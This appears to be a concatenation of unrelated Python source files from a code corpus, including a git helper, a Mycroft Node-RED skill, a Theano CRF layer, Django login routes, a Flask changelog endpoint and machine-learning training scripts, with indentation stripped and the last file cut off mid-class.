#url = url.decode()
splat = url.split('/')
splat = splat[-1].split('.')
splat = splat[0].split('\n')
return splat[0]
def getBaseRepoName(folder):
repo = getRepo(folder)
base = parseRepo(repo)
return base
if __name__ == '__main__':
cwd = os.getcwd()
f = cwd + '/birdseye.py'
folder = os.path.split(f)[0]
line = 20
print()
print("Get author: ")
print(getAuthor(f,line))
#branch = getBranch(folder)
#print(resetHead(folder,branch))
#print(checkoutRevision(folder,10))
print()
print("Line count: " + getLineCount(folder))
file_count = getFileCount(folder)
print()
print("File count: " + file_count)
last_commit = getLastCommit(folder)
print()
print("Last commit: ")
print(last_commit)
last_commit_date = getLastCommitDate(folder)
print()
print("Last commit date: ")
print(last_commit_date)
commit_number = getCommitNumber(folder)
print()
print("Last commit number: ")
print(commit_number)
repo = getRepo(folder)
print()
print("Repo: " + repo)
base = parseRepo(repo)
print()
print("Base: " + base)
print("Base repo name: " + getBaseRepoName(folder))
print()
#print(resetHead(folder,branch))
|
55475
|
from mycroft.messagebus.message import Message, dig_for_message
from mycroft.skills.core import FallbackSkill, intent_file_handler, intent_handler
from adapt.intent import IntentBuilder
from jarbas_hive_mind_red import get_listener
from jarbas_hive_mind.settings import CERTS_PATH
from jarbas_hive_mind.database import ClientDatabase
from jarbas_utils import create_daemon
import time
class NodeRedSkill(FallbackSkill):
def __init__(self):
super(NodeRedSkill, self).__init__(name='NodeRedSkill')
# can not reload, twisted reactor can not be restarted
self.reload_skill = False
if "timeout" not in self.settings:
self.settings["timeout"] = 15
if "secret" not in self.settings:
self.settings["secret"] = "unsafe"
if "priority" not in self.settings:
self.settings["priority"] = 50
# TODO pass these to hivemind / settingsmeta
if "host" not in self.settings:
self.settings["host"] = "127.0.0.1"
if "port" not in self.settings:
self.settings["port"] = 6789
if "ip_list" not in self.settings:
self.settings["ip_list"] = []
if "ip_blacklist" not in self.settings:
self.settings["ip_blacklist"] = True
if "safe_mode" not in self.settings:
self.settings["safe_mode"] = False
if "message_whitelist" not in self.settings:
self.settings["message_whitelist"] = []
if "cert" not in self.settings:
self.settings["cert"] = CERTS_PATH + '/red.crt'
if "key" not in self.settings:
self.settings["key"] = CERTS_PATH + '/red.key'
if "ssl" not in self.settings:
self.settings["ssl"] = False
self.waiting_for_node = False
self.conversing = False
self.old_key = self.settings["secret"]
self._error = None
self.settings_change_callback = self.on_web_settings_change
def initialize(self):
self.register_fallback(self.handle_fallback,
int(self.settings["priority"]))
self.add_event("node_red.success", self.handle_node_success)
self.add_event("node_red.intent_failure", self.handle_node_failure)
self.add_event("node_red.converse.activate",
self.handle_converse_enable)
self.add_event("node_red.converse.deactivate",
self.handle_converse_disable)
self.add_event("hive.client.connection.error",
self.handle_wrong_key)
self.converse_thread = create_daemon(self.converse_keepalive)
self.node_setup()
def on_web_settings_change(self):
self.change_password()
def change_password(self, force=False):
with ClientDatabase() as db:
mail = "<EMAIL>"
name = "nodered"
key = self.settings["secret"]
if not force:
if self.old_key != key:
db.change_key(self.old_key, key)
self.old_key = key
self.speak_dialog("change_key", wait=True)
self.speak_dialog("please_reboot")
self.set_context("KEY_CHANGED")
else:
db.add_client(name, mail, key, crypto_key=None)
@intent_handler(IntentBuilder("WhyRebootIntent")
.require("WhyKeyword").require("KEY_CHANGED"))
def handle_why_reboot(self, message):
self.speak_dialog("why", wait=True)
def handle_wrong_key(self, message):
error = message.data.get("error")
if self._error is None or error != self._error:
self.speak_dialog("bad_key")
self.speak(error)
self._error = error
def node_setup(self):
self.change_password(force=True)
self.node = get_listener(bus=self.bus)
config = {
"port": self.settings["port"],
"host": self.settings["host"],
"ssl":
{"use_ssl": self.settings["ssl"]}
}
self.node.load_config(config)
self.node._autorun = False
self.node.listen()
def shutdown(self):
self.node.stop_from_thread()
if self.converse_thread.running:
self.converse_thread.join(2)
super(NodeRedSkill, self).shutdown()
def get_intro_message(self):
# welcome dialog on skill install
self.speak_dialog("intro")
# node red control intents
@intent_file_handler("pingnode.intent")
def handle_ping_node(self, message):
self.speak("ping")
def pong(message):
self.speak("pong")
self.bus.once("node_red.pong", pong)
message = message.forward("node_red.ping")
self.bus.emit(message)
@intent_file_handler("converse.enable.intent")
def handle_converse_enable(self, message):
if self.conversing:
self.speak_dialog("converse_on")
else:
self.speak_dialog("converse_enable")
self.conversing = True
@intent_file_handler("converse.disable.intent")
def handle_converse_disable(self, message):
if not self.conversing:
self.speak_dialog("converse_off")
else:
self.speak_dialog("converse_disable")
self.conversing = False
# node red event handlers
def handle_node_success(self, message):
self.waiting_for_node = False
self.success = True
def handle_node_failure(self, message):
self.waiting_for_node = False
self.success = False
def wait_for_node(self):
start = time.time()
self.success = False
self.waiting_for_node = True
while self.waiting_for_node and \
time.time() - start < float(self.settings["timeout"]):
time.sleep(0.1)
if self.waiting_for_node:
message = dig_for_message()
if not message:
message = Message("node_red.timeout")
else:
message.reply("node_red.timeout")
self.bus.emit(message)
self.waiting_for_node = False
return self.success
# converse
def converse_keepalive(self):
while True:
if self.conversing:
# avoid converse timed_out
self.make_active()
time.sleep(60)
def converse(self, utterances, lang="en-us"):
if self.conversing:
message = dig_for_message()
if message:
message = message.reply("node_red.converse",
{"utterance": utterances[0]})
else:
message = Message("node_red.converse",
{"utterance": utterances[0]})
if not message.context.get("platform", "").startswith("NodeRedMind"):
self.bus.emit(message)
return self.wait_for_node()
return False
# fallback
def handle_fallback(self, message):
message = message.reply("node_red.fallback", message.data)
self.bus.emit(message)
return self.wait_for_node()
def create_skill():
return NodeRedSkill()
|
55484
|
import os
import numpy as np
import random
from math import isclose
import torch
import matplotlib.pyplot as plt
from modelZoo.DyanOF import OFModel, fista
from torch.autograd import Variable
import torch.nn
def gridRing(N):
# epsilon_low = 0.25
# epsilon_high = 0.15
# rmin = (1 - epsilon_low)
# rmax = (1 + epsilon_high)
epsilon_low = 0.25
epsilon_high = 0.15
rmin = (1 - epsilon_low)
rmax = (1 + epsilon_high)
thetaMin = 0.001
thetaMax = np.pi / 2 - 0.001
delta = 0.001
# Npole = int(N / 4)
Npole = int(N/2)
Pool = generateGridPoles(delta, rmin, rmax, thetaMin, thetaMax)
M = len(Pool)
idx = random.sample(range(0, M), Npole)
P = Pool[idx]
Pall = np.concatenate((P, -P, np.conjugate(P), np.conjugate(-P)), axis=0)
return P, Pall
## Generate the grid on poles
def generateGridPoles(delta, rmin, rmax, thetaMin, thetaMax):
rmin2 = pow(rmin, 2)
rmax2 = pow(rmax, 2)
xv = np.arange(-rmax, rmax, delta)
x, y = np.meshgrid(xv, xv, sparse=False)
mask = np.logical_and(np.logical_and(x ** 2 + y ** 2 >= rmin2, x ** 2 + y ** 2 <= rmax2),
np.logical_and(np.angle(x + 1j * y) >= thetaMin, np.angle(x + 1j * y) <= thetaMax))
px = x[mask]
py = y[mask]
P = px + 1j * py
return P
def getRowSparsity(inputDict):
rowNum = inputDict.shape[0]
L = inputDict.shape[1]
count = 0
for i in range(0, rowNum):
dictRow = inputDict[i,:].unsqueeze(0)
if len(dictRow.nonzero()) <= round(0.6*L):
count+=1
else:
continue
rowSparsity = count
return rowSparsity
def get_recover_fista(D, y, key_set, param, gpu_id):
if type(D) is np.ndarray:
D = torch.Tensor(D)
D_r = D[key_set]
if len(y.shape)==3:
y_r = y[:,key_set]
else:
y_r = y[key_set]
if D.is_cuda:
c_r = fista(D_r, y_r, param, 100, gpu_id)
y_hat = torch.matmul(D, c_r)
else:
c_r = fista(D_r.cuda(gpu_id), y_r, param, 100, gpu_id)
y_hat = torch.matmul(D.cuda(gpu_id), c_r)
return y_hat
|
55500
|
import csv
import itertools
def _boolean(data):
if data == "False":
result = False
else:
result = True
return result
def row_to_location(row):
if row[4] == "0":
sub = False
nosub = True
else:
sub = True
nosub = False
tss = _boolean(row[6])
term = _boolean(row[8])
return {"have no sub-operons": nosub, "have sub-operons": sub,
"start with tss": tss, "stop with terminator": term}
def plus_num(num_total, strain, type_):
num_total["total"][type_] += 1
num_total[strain][type_] += 1
num_total["total"]["total"] += 1
num_total[strain]["total"] += 1
def print_stat(operons, total_num, class_operon, out):
num_features = {}
out.write("Total number of operons is {0}\n".format(total_num))
out.write("The sub operon and features:\n")
for operon in operons:
for it in range(1, 5):
for features in itertools.combinations(operon.keys(), it):
check_key = 0
for key in features:
if operon[key]:
if it == 1:
if key in num_features.keys():
num_features[key] += 1
else:
num_features[key] = 1
check_key += 1
if (check_key == it) and (it != 1):
key = " and ".join(features)
if key in num_features.keys():
num_features[key] += 1
else:
num_features[key] = 1
for key, value in num_features.items():
out.write("\tthe number of operons which {0} = {1} ({2})\n".format(
key, value, float(value) / float(total_num)))
out.write("mono/polycistronic:\n")
out.write("\tmonocistronic: {0} ({1})\n".format(
class_operon["mono"],
float(class_operon["mono"]) / float(class_operon["total"])))
out.write("\tpolycistronic: {0} ({1})\n".format(
class_operon["poly"],
float(class_operon["poly"]) / float(class_operon["total"])))
def stat(input_file, out_file):
out = open(out_file, "w")
operons = {}
operons_all = []
tmp_id = ""
f_h = open(input_file, "r")
pre_seq_id = ""
total_num = {}
total_num_all = 0
class_operon = {}
class_operon["total"] = {"na": 0, "mono": 0, "poly": 0, "total": 0}
for row in csv.reader(f_h, delimiter="\t"):
if row[0] != "Operon_ID":
if row[0] != tmp_id:
if pre_seq_id != row[1]:
pre_seq_id = row[1]
operons[row[1]] = []
total_num[row[1]] = 0
class_operon[row[1]] = {"na": 0, "mono": 0,
"poly": 0, "total": 0}
operons[row[1]].append(row_to_location(row))
operons_all.append(row_to_location(row))
total_num[row[1]] += 1
total_num_all += 1
if row[-1] == "NA":
plus_num(class_operon, row[1], "na")
elif len(row[-1].split(",")) == 1:
plus_num(class_operon, row[1], "mono")
elif len(row[-1].split(",")) > 1:
plus_num(class_operon, row[1], "poly")
tmp_id = row[0]
if len(operons) > 1:
out.write("All genomes:\n")
print_stat(operons_all, total_num_all, class_operon["total"], out)
for strain in operons.keys():
out.write("\n" + strain + ":\n")
print_stat(operons[strain], total_num[strain],
class_operon[strain], out)
out.close()
f_h.close()
|
55517
|
import argparse
import os
class Opts:
def __init__(self):
self.parser = argparse.ArgumentParser()
def init(self):
self.parser.add_argument('-expID', default='default', help='Experiment ID')
self.parser.add_argument('-data', default='default', help='Input data folder')
self.parser.add_argument('-nThreads', default=4, type=int, help='Number of threads')
self.parser.add_argument('-expDir', default='../exp', help='Experiments directory')
self.parser.add_argument('-scaleAugFactor', default=0.25, type=float, help='Scale augment factor')
self.parser.add_argument('-rotAugProb', default=0.4, type=float, help='Rotation augment probability')
self.parser.add_argument('-flipAugProb', default=0.5, type=float, help='Flip augment probability')
self.parser.add_argument('-rotAugFactor', default=30, type=float, help='Rotation augment factor')
self.parser.add_argument('-colorAugFactor', default=0.2, type=float, help='Colo augment factor')
self.parser.add_argument('-imgSize', default=368, type=int, help='Number of threads')
self.parser.add_argument('-hmSize', default=46, type=int, help='Number of threads')
self.parser.add_argument('-DEBUG', type=int, default=0, help='Debug')
self.parser.add_argument('-sigmaPAF', default=5, type=int, help='Width of PAF')
self.parser.add_argument('-sigmaHM', default=7, type=int, help='Std. of Heatmap')
self.parser.add_argument('-variableWidthPAF', dest='variableWidthPAF', action='store_true', help='Variable width PAF based on length of part')
self.parser.add_argument('-dataset', default='coco', help='Dataset')
self.parser.add_argument('-model', default='vgg', help='Model')
self.parser.add_argument('-batchSize', default=8, type=int, help='Batch Size')
self.parser.add_argument('-LR', default=1e-3, type=float, help='Learn Rate')
self.parser.add_argument('-nEpoch', default=150, type=int, help='Number of Epochs')
self.parser.add_argument('-dropLR', type=float, default=50, help='Drop LR')
self.parser.add_argument('-valInterval', type=int, default=1, help='Val Interval')
self.parser.add_argument('-loadModel', default='none', help='Load pre-trained')
self.parser.add_argument('-train', dest='train', action='store_true', help='Train')
self.parser.add_argument('-vizOut', dest='vizOut', action='store_true', help='Visualize output?')
self.parser.add_argument('-criterionHm', default='mse', help='Heatmap Criterion')
self.parser.add_argument('-criterionPaf', default='mse', help='PAF Criterion')
def parse(self):
self.init()
self.opt = self.parser.parse_args()
self.opt.saveDir = os.path.join(self.opt.expDir, self.opt.expID)
if self.opt.DEBUG > 0:
self.opt.nThreads = 1
args = dict((name, getattr(self.opt, name)) for name in dir(self.opt)
if not name.startswith('_'))
if not os.path.exists(self.opt.saveDir):
os.makedirs(self.opt.saveDir)
file_name = os.path.join(self.opt.saveDir, 'opt.txt')
with open(file_name, 'wt') as opt_file:
opt_file.write('==> Args:\n')
for k, v in sorted(args.items()):
opt_file.write(' %s: %s\n' % (str(k), str(v)))
return self.opt
|
55519
|
import komand
from .schema import ListAllActivityMonitorMatchesInput, ListAllActivityMonitorMatchesOutput
# Custom imports below
class ListAllActivityMonitorMatches(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name="list_all_activity_monitor_matches",
description="Fetches a list of all activity monitor matches, " "sorted by the creation time of the match",
input=ListAllActivityMonitorMatchesInput(),
output=ListAllActivityMonitorMatchesOutput(),
)
def run(self, params={}):
max_results = params.get("max_results", 100)
api = self.connection.api
return {"activity_monitor_matches": api.list_all_activity_monitor_matches(max_results=max_results)}
|
55526
|
class n_A(flatdata.archive.Archive):
_SCHEMA = """namespace n {
archive A
{
}
}
"""
_NAME = "A"
_RESOURCES = {
"A.archive" : flatdata.archive.ResourceSignature(
container=flatdata.resources.RawData,
initializer=None,
schema=_SCHEMA,
is_optional=False,
doc="Archive signature"),
}
def __init__(self, resource_storage):
flatdata.archive.Archive.__init__(self, resource_storage)
|
55534
|
import theano
import numpy
# CRF implementation based on Lample et al.
# "Neural Architectures for Named Entity Recognition"
floatX=theano.config.floatX
def log_sum(x, axis=None):
x_max_value = x.max(axis=axis)
x_max_tensor = x.max(axis=axis, keepdims=True)
return x_max_value + theano.tensor.log(theano.tensor.exp(x - x_max_tensor).sum(axis=axis))
def forward(observation_weights, transition_weights, return_best_sequence=False):
def recurrence(observation_weights, previous_scores, transition_weights):
previous_scores = previous_scores.dimshuffle(0, 1, 'x')
observation_weights = observation_weights.dimshuffle(0, 'x', 1)
scores = previous_scores + observation_weights + transition_weights.dimshuffle('x', 0, 1)
if return_best_sequence:
best_scores = scores.max(axis=1)
best_states = scores.argmax(axis=1)
return best_scores, best_states
else:
return log_sum(scores, axis=1)
initial = observation_weights[0]
crf_states, _ = theano.scan(
fn=recurrence,
outputs_info=(initial, None) if return_best_sequence else initial,
sequences=[observation_weights[1:],],
non_sequences=transition_weights
)
if return_best_sequence:
sequence, _ = theano.scan(
fn=lambda beta_i, previous: beta_i[theano.tensor.arange(previous.shape[0]), previous],
outputs_info=theano.tensor.cast(theano.tensor.argmax(crf_states[0][-1], axis=1), 'int32'),
sequences=theano.tensor.cast(crf_states[1][::-1], 'int32')
)
sequence = theano.tensor.concatenate([sequence[::-1], [theano.tensor.argmax(crf_states[0][-1], axis=1)]])
return sequence, crf_states[0]
else:
return log_sum(crf_states[-1], axis=1)
def construct(name, input_tensor, n_labels, gold_labels, fn_create_parameter_matrix):
transition_weights = fn_create_parameter_matrix(name + "_crf_transition_weights", (n_labels + 2, n_labels + 2))
small = -1000.0
padding_start = theano.tensor.zeros((input_tensor.shape[0], 1, n_labels + 2)) + small
padding_start = theano.tensor.set_subtensor(padding_start[:,:,-2], 0.0)
padding_end = theano.tensor.zeros((input_tensor.shape[0], 1, n_labels + 2)) + small
padding_end = theano.tensor.set_subtensor(padding_end[:,:,-1], 0.0)
observation_weights = theano.tensor.concatenate([input_tensor, theano.tensor.zeros((input_tensor.shape[0], input_tensor.shape[1], 2)) + small], axis=2)
observation_weights = theano.tensor.concatenate([padding_start, observation_weights, padding_end], axis=1)
observation_weights = observation_weights.dimshuffle(1,0,2) # reordering the tensor (words, sentences, labels)
# Score from tags
real_paths_scores = input_tensor[theano.tensor.arange(input_tensor.shape[0])[:, numpy.newaxis], theano.tensor.arange(input_tensor.shape[1]), gold_labels].sum(axis=1)
# Score from transition_weights
padding_id_start = theano.tensor.zeros((gold_labels.shape[0], 1), dtype=numpy.int32) + n_labels
padding_id_end = theano.tensor.zeros((gold_labels.shape[0], 1), dtype=numpy.int32) + n_labels + 1
padded_gold_labels = theano.tensor.concatenate([padding_id_start, gold_labels, padding_id_end], axis=1)
real_paths_scores += transition_weights[
padded_gold_labels[theano.tensor.arange(gold_labels.shape[0])[:, numpy.newaxis], theano.tensor.arange(gold_labels.shape[1] + 1)],
padded_gold_labels[theano.tensor.arange(gold_labels.shape[0])[:, numpy.newaxis], theano.tensor.arange(gold_labels.shape[1] + 1) + 1]
].sum(axis=1)
all_paths_scores = forward(observation_weights, transition_weights)
best_sequence, scores = forward(observation_weights, transition_weights, return_best_sequence=True)
scores = scores.dimshuffle(1,0,2)[:,:-1,:-2]
best_sequence = best_sequence.dimshuffle(1,0)[:,1:-1]
return all_paths_scores, real_paths_scores, best_sequence, scores
|
55613
|
from django.conf.urls import url
from ratelimitbackend import admin
from ratelimitbackend.views import login
from .forms import CustomAuthForm, TokenOnlyAuthForm
urlpatterns = [
url(r'^login/$', login,
{'template_name': 'admin/login.html'}, name='login'),
url(r'^custom_login/$', login,
{'template_name': 'custom_login.html',
'authentication_form': CustomAuthForm},
name='custom_login'),
url(r'^token_login/$', login,
{'template_name': 'token_only_login.html',
'authentication_form': TokenOnlyAuthForm},
name='token_only_login'),
url(r'^admin/', admin.site.urls),
]
|
55683
|
from typing import Union
import flask_restx
import flask
from keepachangelog._changelog import to_dict
def add_changelog_endpoint(
namespace: Union[flask_restx.Namespace, flask_restx.Api], changelog_path: str
):
"""
Create /changelog: Changelog endpoint parsing https://keepachangelog.com/en/1.0.0/
:param namespace: The Flask-RestX namespace.
:param changelog_path: Path to CHANGELOG.md.
"""
@namespace.route("/changelog")
@namespace.doc(
responses={
200: (
"Service changelog.",
[
namespace.model(
"ChangelogReleaseModel",
{
"metadata": namespace.model(
"ChangelogReleaseMetaDataModel",
{
"version": flask_restx.fields.String(
description="Release version following semantic versioning.",
required=True,
example="3.12.5",
),
"release_date": flask_restx.fields.Date(
description="Release date.",
required=True,
example="2019-12-31",
),
},
),
"added": flask_restx.fields.List(
flask_restx.fields.String(description="New features.")
),
"changed": flask_restx.fields.List(
flask_restx.fields.String(
description="Changes in existing functionaliy."
)
),
"deprecated": flask_restx.fields.List(
flask_restx.fields.String(
description="Soon-to-be removed features."
)
),
"removed": flask_restx.fields.List(
flask_restx.fields.String(
description="Removed features."
)
),
"fixed": flask_restx.fields.List(
flask_restx.fields.String(description="Any bug fixes.")
),
"security": flask_restx.fields.List(
flask_restx.fields.String(
description="Vulnerabilities."
)
),
},
)
],
)
}
)
class Changelog(flask_restx.Resource):
def get(self):
"""
Retrieve service changelog.
"""
try:
return flask.jsonify(to_dict(changelog_path))
except FileNotFoundError:
return flask.jsonify({})
|
55692
|
import tensorflow as tf
import numpy as np
import os
import pickle
from utils.symbolic_network import SymbolicNet, MaskedSymbolicNet, SymbolicCell
from utils import functions, regularization, helpers, pretty_print
import argparse
def main(results_dir='results/sho/test', trials=1, learning_rate=1e-2, reg_weight=2e-4, timesteps=25, batch_size=129,
n_epochs1=2001, n_epochs2=5001, n_epochs3=5001):
# Hyperparameters
summary_step = 500
timesteps0 = 1
primitive_funcs = [
*[functions.Constant()] * 2,
*[functions.Identity()] * 4,
*[functions.Square()] * 4,
*[functions.Sin()] * 2,
*[functions.Exp()] * 2,
*[functions.Sigmoid()] * 2,
*[functions.Product(norm=0.1)] * 2,
]
# Import parabola data
data = np.load('dataset/sho.npz')
x_d = np.asarray(data["x_d"])
x_v = np.asarray(data["x_v"])
y_d = np.asarray(data["y_d"])
y_v = np.asarray(data["y_v"])
omega2_data = data["omega2"]
N = data["N"]
# Prepare data
x = np.stack((x_d, x_v), axis=2) # Shape (N, NT, 2)
y0 = np.stack((y_d[:, 0], y_v[:, 0]), axis=1) # Initial conditions for prediction y, fed into propagator
y_data = np.stack((y_d[:, 1:timesteps + 1], y_v[:, 1:timesteps + 1]), axis=2) # shape(NG, LENGTH, 2)
# Tensorflow placeholders for x, y0, y
x_input = tf.placeholder(shape=(None, x.shape[1], x.shape[2]), dtype=tf.float32, name="enc_input")
y0_input = tf.placeholder(shape=(None, 2), dtype=tf.float32, name="prop_input") # input is d, v
y_input = tf.placeholder(shape=(None, timesteps, 2), dtype=tf.float32, name="label_input")
length_input = tf.placeholder(dtype=tf.int32, shape=())
# Dynamics encoder
encoder = helpers.Encoder()
training = tf.placeholder_with_default(False, [])
z = encoder(x_input, training=training)
z_data = omega2_data[:, np.newaxis]
# Propagating decoders
prop_d = SymbolicNet(2, funcs=primitive_funcs)
prop_v = SymbolicNet(2, funcs=primitive_funcs)
prop_d.build(4)
prop_v.build(4)
# Building recurrent structure
rnn = tf.keras.layers.RNN(SymbolicCell(prop_d, prop_v), return_sequences=True)
y0_rnn = tf.concat([tf.expand_dims(y0_input, axis=1), tf.zeros((tf.shape(y0_input)[0], length_input - 1, 2))],
axis=1)
prop_input = tf.concat([y0_rnn, tf.keras.backend.repeat(z, length_input),
tf.ones((tf.shape(y0_input)[0], length_input, 1))], axis=2)
prop_output = rnn(prop_input)
epoch = tf.placeholder(tf.float32)
reg_freq = np.pi / (n_epochs1 + n_epochs2) / 1.1
reg_loss = tf.sin(reg_freq * epoch) ** 2 * regularization.l12_smooth(prop_d.get_weights()) + \
tf.sin(reg_freq * epoch) ** 2 * regularization.l12_smooth(prop_v.get_weights())
# reg_loss = regularization.l12_smooth(prop_d.get_weights()) + regularization.l12_smooth(prop_v.get_weights())
# Training
learning_rate_ph = tf.placeholder(tf.float32)
opt = tf.train.RMSPropOptimizer(learning_rate=learning_rate_ph)
reg_weight_ph = tf.placeholder(tf.float32)
error = tf.losses.mean_squared_error(labels=y_input[:, :length_input, :], predictions=prop_output)
loss = error + reg_weight_ph * reg_loss
train = tf.group([opt.minimize(loss), encoder.bn.updates])
batch = helpers.batch_generator([x, y_data, y0, z_data], N=N, batch_size=batch_size)
# Training session
with tf.Session() as sess:
for _ in range(trials):
loss_i = np.nan
while np.isnan(loss_i):
loss_list = []
error_list = []
reg_list = []
sess.run(tf.global_variables_initializer())
for i in range(n_epochs1 + n_epochs2):
if i < n_epochs1:
reg_weight_i = reg_weight / 5
learning_rate_i = learning_rate
length_i = min(i // 500 * 2 + timesteps0, timesteps)
else:
reg_weight_i = reg_weight
learning_rate_i = learning_rate / 5
length_i = timesteps
x_batch, y_batch, y0_batch, z_batch = next(batch)
feed_dict = {x_input: x_batch, y0_input: y0_batch, y_input: y_batch,
epoch: i, learning_rate_ph: learning_rate_i, training: True,
reg_weight_ph: reg_weight_i, length_input: length_i}
_ = sess.run(train, feed_dict=feed_dict)
if i % summary_step == 0 or i == n_epochs1 - 1:
feed_dict[training] = False
loss_i, error_i, reg_i = sess.run((loss, error, reg_loss), feed_dict=feed_dict)
z_arr = sess.run(z, feed_dict=feed_dict)
r = np.corrcoef(z_batch[:, 0], z_arr[:, 0])[1, 0]
loss_list.append(loss_i)
error_list.append(error_i)
reg_list.append(reg_i)
print("Epoch %d\tTotal loss: %f\tError: %f\tReg loss: %f\tCorrelation: %f"
% (i, loss_i, error_i, reg_i, r))
if np.isnan(loss_i):
break
# Setting small weights to 0 and freezing them
prop_d_masked = MaskedSymbolicNet(sess, prop_d, threshold=0.01)
prop_v_masked = MaskedSymbolicNet(sess, prop_v, threshold=0.01)
# Keep track of currently existing variables. When we rebuild the rnn, it makes new variables that we need
# to initialize. Later, we will use this to figure out what the uninitialized variables are.
temp = set(tf.global_variables())
# Rebuilding the decoding propagator. Remove regularization
rnn = tf.keras.layers.RNN(SymbolicCell(prop_d_masked, prop_v_masked), return_sequences=True)
prop_output = rnn(prop_input)
loss = tf.losses.mean_squared_error(labels=y_input[:, :length_input, :], predictions=prop_output)
train = tf.group([opt.minimize(loss), encoder.bn.updates])
weights_d = sess.run(prop_d_masked.get_weights())
expr_d = pretty_print.network(weights_d, primitive_funcs, ["d", "v", "z", 1])
print(expr_d)
weights_v = sess.run(prop_v_masked.get_weights())
expr_v = pretty_print.network(weights_v, primitive_funcs, ["d", "v", "z", 1])
print(expr_v)
print("Frozen weights. Next stage of training.")
# Initialize only the uninitialized variables.
sess.run(tf.variables_initializer(set(tf.global_variables()) - temp))
for i in range(n_epochs3):
x_batch, y_batch, y0_batch, z_batch = next(batch)
feed_dict = {x_input: x_batch, y0_input: y0_batch, y_input: y_batch,
epoch: 0, learning_rate_ph: learning_rate / 10, training: True, reg_weight_ph: 0,
length_input: length_i}
_ = sess.run(train, feed_dict=feed_dict)
if i % summary_step == 0:
feed_dict[training] = False
loss_i, error_i, reg_i = sess.run((loss, error, reg_loss), feed_dict=feed_dict)
z_arr = sess.run(z, feed_dict=feed_dict)
r = np.corrcoef(z_batch[:, 0], z_arr[:, 0])[1, 0]
loss_list.append(loss_i)
error_list.append(error_i)
reg_list.append(reg_i)
print("Epoch %d\tError: %g\tCorrelation: %f" % (i, error_i, r))
weights_d = sess.run(prop_d_masked.get_weights())
expr_d = pretty_print.network(weights_d, primitive_funcs, ["d", "v", "z", 1])
print(expr_d)
weights_v = sess.run(prop_v_masked.get_weights())
expr_v = pretty_print.network(weights_v, primitive_funcs, ["d", "v", "z", 1])
print(expr_v)
# Save results
results = {
"summary_step": summary_step,
"learning_rate": learning_rate,
"n_epochs1": n_epochs1,
"n_epochs2": n_epochs2,
"reg_weight": reg_weight,
"timesteps": timesteps,
"timesteps0": timesteps0,
"weights_d": weights_d,
"weights_v": weights_v,
"loss_plot": loss_list,
"error_plot": error_list,
"reg_plot": reg_list,
"expr_d": expr_d,
"expr_v": expr_v
}
trial_dir = helpers.get_trial_path(results_dir) # Get directory in which to save trial results
tf.saved_model.simple_save(sess, trial_dir,
inputs={"x": x_input, "y0": y0_input, "training": training},
outputs={"z": z, "y": prop_output})
# Save a summary of the parameters and results
with open(os.path.join(trial_dir, 'summary.pickle'), "wb+") as f:
pickle.dump(results, f)
with open(os.path.join(results_dir, 'eq_summary.txt'), 'a') as f:
f.write(str(expr_d) + "\n")
f.write(str(expr_v) + "\n")
f.write("Error: %f\n\n" % error_list[-1])
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Train the EQL network on simple harmonic oscillator (SHO) task.")
parser.add_argument("--results-dir", type=str, default='results/sho/test')
parser.add_argument("--reg-weight", type=float, default=2e-4, help='Regularization weight, lambda')
parser.add_argument('--learning-rate', type=float, default=1e-2, help='Base learning rate for training')
parser.add_argument('--batch-size', type=int, default=128)
parser.add_argument("--n-epochs1", type=int, default=2001, help="Number of epochs to train in 1st stage")
parser.add_argument("--n-epochs2", type=int, default=5001, help="Number of epochs to train in 2nd stage")
parser.add_argument("--n-epochs3", type=int, default=5001, help="Number of epochs to train in 3rd stage")
parser.add_argument("--timesteps", type=int, default=25, help="Number of time steps to predict")
parser.add_argument('--trials', type=int, default=1, help="Number of trials to train.")
args = parser.parse_args()
kwargs = vars(args)
print(kwargs)
if not os.path.exists(kwargs['results_dir']):
os.makedirs(kwargs['results_dir'])
meta = open(os.path.join(kwargs['results_dir'], 'args.txt'), 'a')
import json
meta.write(json.dumps(kwargs))
meta.close()
main(**kwargs)
|
55697
|
from setuptools import setup, find_packages
from os import path
import re
def read_file(file_name: str) -> str:
here = path.abspath(path.dirname(__file__))
with open(path.join(here, file_name), encoding="utf-8") as f:
return f.read()
long_description = read_file("README.md")
version = re.sub("\s+", "", read_file("version.txt"))
setup(
name="signal-ocean",
version=version,
description="Access Signal Ocean Platform data using Python.",
long_description=long_description,
long_description_content_type="text/markdown",
author="Signal Ocean Developers",
author_email="<EMAIL>",
license="Apache 2.0",
url="https://apis.signalocean.com/",
packages=find_packages(exclude=["tests", "tests.*"]),
python_requires=">=3.7",
install_requires=[
"requests>=2.23.0,<3",
"python-dateutil>=2.8.1,<3",
"pandas>=1.0.3,<2",
],
classifiers=[
"Development Status :: 4 - Beta",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"License :: OSI Approved :: Apache Software License",
],
project_urls={
"The Signal Group": "https://www.thesignalgroup.com/",
"Signal Ocean": "https://www.signalocean.com/",
"The Signal Ocean Platform": "https://app.signalocean.com",
},
)
|
55713
|
import torch
import torch.utils.data
from torch import nn
from torch.nn import functional as F
from rlkit.pythonplusplus import identity
from rlkit.torch import pytorch_util as ptu
import numpy as np
from rlkit.torch.conv_networks import CNN, DCNN
from rlkit.torch.vae.vae_base import GaussianLatentVAE
imsize48_default_architecture = dict(
conv_args=dict( # conv layers
kernel_sizes=[5, 3, 3],
n_channels=[16, 32, 64],
strides=[3, 2, 2],
output_size=6,
),
conv_kwargs=dict(
hidden_sizes=[], # linear layers after conv
batch_norm_conv=False,
batch_norm_fc=False,
),
LSTM_args=dict(
input_size=6,
hidden_size=128,
),
LSTM_kwargs=dict(
num_layers=2,
),
deconv_args=dict(
hidden_sizes=[],
deconv_input_width=3,
deconv_input_height=3,
deconv_input_channels=64,
deconv_output_kernel_size=6,
deconv_output_strides=3,
deconv_output_channels=3,
kernel_sizes=[3, 3],
n_channels=[32, 16],
strides=[2, 2],
),
deconv_kwargs=dict(
batch_norm_deconv=False,
batch_norm_fc=False,
)
)
class ConvLSTM2(nn.Module):
def __init__(
self,
representation_size,
architecture,
encoder_class=CNN,
decoder_class=DCNN,
decoder_output_activation=identity,
decoder_distribution='gaussian_identity_variance',
input_channels=3,
imsize=48,
init_w=1e-3,
min_variance=1e-3,
hidden_init=ptu.fanin_init,
detach_vae_output=True,
):
super(ConvLSTM2, self).__init__()
self.representation_size = representation_size
# record the empirical statistics of latents, when not sample from true prior, sample from them.
self.dist_mu = np.zeros(self.representation_size)
self.dist_std = np.ones(self.representation_size)
if min_variance is None:
self.log_min_variance = None
else:
